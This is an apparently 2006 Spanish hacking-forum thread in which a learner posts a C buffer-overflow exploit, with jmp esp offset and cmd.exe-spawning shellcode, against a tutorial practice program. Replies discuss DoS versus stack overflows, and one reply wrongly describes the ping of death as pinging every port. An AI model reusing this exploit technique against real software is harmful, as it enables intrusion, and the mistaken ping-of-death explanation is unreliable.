elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 02:46  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Problema con exploit
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con exploit  (Leído 1,525 veces)
y0mism0

Desconectado Desconectado

Ver Perfil
Problema con exploit
« en: 21 Septiembre 2006, 19:24 »

Bueno, el caso esque me lei el texto de Rojodos, pero el exploit no me funciona. La shellcode esta bien, porque la probe aparte, cuando estaba escrita en asm y se ejecutaba la shell. El evilbuffer tambien esta bien, porque lo mire debugeando y el eip copiado estaba justo debajo de DDDD, y la direccion del offset del jmp esp tambien, por lo menos es el offset que me dio el findjmp... porque no me ejecuta la shell entonces? Intente mirar el codigo del exploit debugeando, pero no econtre el lugar donde se copia la shellcode a el programa vulnerable... debe aparecer debugeando el propio exploit? POngo el codigo por si esta algo mal..

Código:
#include<stdio.h>
#include<stdlib.h>
int main(int argc, char **argv){
char evilbuffer[1024]="AAAABBBBCCCCDDDD";
char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD"
"\x78\xC6\x45\xFE\x65\x8D\x45\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";
char offset[]="\x1c\x80\xF4\x77";
strcat(evilbuffer,offset);
strcat(evilbuffer,shellcode);
printf("%s",evilbuffer);
argv[0]="overflow";
argv[1]=evilbuffer;
argv[2]=NULL;
execv("overflow.exe",argv);
}

Tambien aprovecho para hacer una pregunta, jejej, me gustaria saber sobre las diferencias entre un ataque Dos y un stack overflow. Por ej, el antiguo ping de la muerte, por una parte lei hace ya tiempo que se trataba de un stack overflow, que reventaba la pila tcp/ip. En ese caso, porque se colgaba el pc, no se deberia simplemento cerrar el programa, como el el caso del manual de Rojodos? O esque la pila tcp/ip no se refiere a una pila normal, de que programa es esa pila tcp/ip?¿?
POr otra parte lei que se trataba de un DOS, estamos, en el mismo caso de antes, nose porque se apaga el pc por un simple DOs, en todos caso se cerrara el proceso que es atacado , no? En cualquier caso al final no me aclare si se trataba de un DOS o de un stack overflow...

SAludos.
« Última modificación: 21 Septiembre 2006, 19:26 por loko_69 » En línea
Zinc

Argentina

Ver Perfil
Re: Problema con exploit
« Respuesta #1 en: 21 Septiembre 2006, 19:38 »

El ping de la muerte lo q hacia era mandar pings a todos los puertos desde el 1 hasta el 65000 para saturar el sistema y asi colgar la pc nada mas!

Básicamente se le envía un paquete a un servidor y este nos contesta, solo que si se le envía un paquete muy grande puede llegar desordenado, por lo que el servidor pide al origen que le vuelva a enviar una parte o la totalidad del paquete, por lo que se produce un datagrama del ping muy grande y producirá su caída

Ya a estas alturas no se registran mas pc's con posibilidades de ejecutar el ping de la muerte.!

Saludos!

Tiempo al tiempo, es tiempo de regresar al foro.elhacker.net...

sirdarckcat
Troll Buena Onda y
CoAdmin

Lavando Platos

Ver Perfil WWW
« Respuesta #2 en: 22 Septiembre 2006, 02:36 »

los ataques DoS lo que hacen es saturar el ancho de banda, o conexiones, de un servidor.. o hacerlo mas lento, etc.. etc.. esos ataques son una simple y estupida tonteria, que puede hacer cualquier persona (si es con spoofing, pues se dificulta un poco mas pero casi nada, y si explota alguna vulnerabilidad que no se basa en la saturacion de conexiones, sino en algun null poiner o algo similar, pues sedificulta un poco mas :P)

los stack overflows saturan la memoria reservada de la pila al pasar una variables de longitudes mayores a su destino.

Saludos!!
« Última modificación: 22 Septiembre 2006, 02:39 por Sdc » En línea

y0mism0

Ver Perfil
« Respuesta #3 en: 23 Septiembre 2006, 01:35 »

Ya, pero porque se colgada el pc por un ping de la muerte? Que es exactamente la pila tcp/ip? Quiero decir si es una pila de un programa normal, no tiene porque carse el sistema entero , solo el programa en ccuestion, no?
Y respecto a lo de los Dos, cualquiera puede hacerlos? no nocesitas tener mayor ancho de banda, ni encontrar ningun bug para hacerlo?

Lo del Exploit del principio supongo que ni idea... El caso esque haciendo un execv, deberia abrirse el programa overflow.exe, o el que le pusiera a la funcion de argumento, no?? Pues el caso esque no se me abre, no se que pasa, y ademas no puedo probar a pasarle los argumentos directamente porque no hay caracteres ascii....:(

Saludos....
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a: